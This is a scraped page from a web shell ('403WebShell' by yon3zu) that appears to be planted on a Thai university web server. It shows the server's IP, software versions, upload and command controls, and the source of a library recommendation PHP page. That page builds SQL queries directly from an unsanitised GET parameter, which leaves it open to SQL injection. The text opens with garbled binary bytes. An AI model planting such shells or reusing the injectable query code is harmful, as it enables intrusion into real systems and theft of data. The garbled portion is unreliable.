h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/arit/IntroForm_ShowData.php
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Untitled Document</title>
<style type="text/css">
<!--

-->

	body
	{
		margin:auto;
		font-family: 'Open Sans', sans-serif;
		font-size: 9.5pt;
		color: #4e4e4e;
		margin-left: 0px;
		margin-top: 0px;
		margin-right: 0px;
		margin-bottom: 0px;
	

	}

.style3 {
	color: #000099;
	font-weight: bold;
}
</style>
</head>

<body>

<?php include "connect_intro_resource.php";

$IntroID=$_GET['IntroID'];
$query=mysql_query("select * from introdetail where IntroID='$IntroID'");
$arr=mysql_fetch_array($query);
$IntroID=$arr[IntroID];
$Fname=$arr[Fname];
$Lname=$arr[Lname];
$Title =$arr[Title];
$Author  =$arr[Author];
$Publisher =$arr[Publisher];
$PulbilshYear =$arr[PulbilshYear];
$Edition =$arr[Edition];
$NumWant =$arr[NumWant];
$Price =$arr[Price];
$SourceStatus =$arr[SourceStatus];
$CallNumber =$arr[CallNumber];
$SourceType =$arr[SourceType];
$ISBN =$arr[ISBN];
$OrderType =$arr[OrderType];
$IntroDate =$arr[IntroDate];


?>

  <form action="IntroForm_EditSubmit.php" method="post" name="f1" onSubmit="return checkFields2();">
  <h2> ข้อมูลผู้แนะนำทรัพยากร </h2> 
  
		 
		  <?php $query=mysql_query("select * from user where Fname = '$Fname' and Lname='$Lname'");
			$arr=mysql_fetch_array($query);
			$Pre=$arr[Pre];
			$Depart=$arr[Depart];
			$MailUser=$arr[MailUser];
			$Tel=$arr[Tel];
		  	
			
	      echo "<table border='1'>";
		  echo "<tr><td>ชื่อ-สกุล</td> <td><span class='style3'>$Pre$Fname  $Lname</span></td></tr>";
		  echo "<tr><td>สังกัด</td> <td><span class='style3'>$Depart </span></td></tr>";
		  echo "<tr><td>อีเมล์</td> <td><span class='style3'>$MailUser</span></td></tr>";

		       

		 	$query2=mysql_query("select * from sourcetype where SourceTypeID='$SourceType'");
			$row2=mysql_num_rows($query2);
			$arr2=mysql_fetch_array($query2);
			$SourceTypeName=$arr2[SourceTypeName];
					 
		 	$query2=mysql_query("select * from statustype where StatusTypeID='$SourceStatus'");
			$row2=mysql_num_rows($query2);
			$arr2=mysql_fetch_array($query2);
			$StatusTypeName=$arr2[StatusTypeName];
			$StatusTypeID=$arr2[StatusTypeID];
			
		 	$query2=mysql_query("select * from ordertype where OrderTypeID='$OrderType'");
			$row2=mysql_num_rows($query2);
			$arr2=mysql_fetch_array($query2);
			$OrderTypeName=$arr2[OrderTypeName];
			
			
		  echo "<tr><td>เบอร์โทร</td> <td><span class='style3'>$Tel </span></td></tr>";
		  echo "<tr><td>ประเภททรัพยากร</td> <td><span class='style3'>$SourceTypeName</span></td></tr>";
		  echo "<tr><td>ชื่อเรื่อง</td> <td><span class='style3'>$Title </span></td></tr>";
		  echo "<tr><td>ชื่อผู้แต่ง</td> <td><span class='style3'>$Author </span></td></tr>";
		  echo "<tr><td>สำนักพิมพ์</td> <td><span class='style3'>$Publisher</span> </td></tr>";
		  echo "<tr><td>ปีที่พิมพ์</td> <td><span class='style3'>$PulbilshYear</span> </td></tr>";
		  echo "<tr><td>ครั้งที่พิมพ์</td> <td><span class='style3'>$Edition </span></td></tr>";
		  echo "<tr><td>จำนวนที่ต้องการ</td> <td><span class='style3'>$NumWant </span></td></tr>";
		  echo "<tr><td>ราคา</td> <td><span class='style3'>$Price </span></td></tr>";
		  echo "<tr><td>ประเภทการแนะนำ</td> <td><span class='style3'>$OrderTypeName </span></td></tr>";
		  echo "<tr><td>สถานะทรัพยากร</td> <td><span class='style3'>$StatusTypeName </span></td></tr>";
		  echo "<tr><td>เลขเรียกหนังสือ</td> <td><span class='style3'>$CallNumber </span></td></tr>";
		  echo "<tr><td>วันที่แนะนำ</td> <td><span class='style3'>$IntroDate </span></td></tr>";
		  echo "</table>";   
			
		  ?>
</body>
</html>

    <td></td>
  </tr>
          <!--DWLayoutTable-->
  </table>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit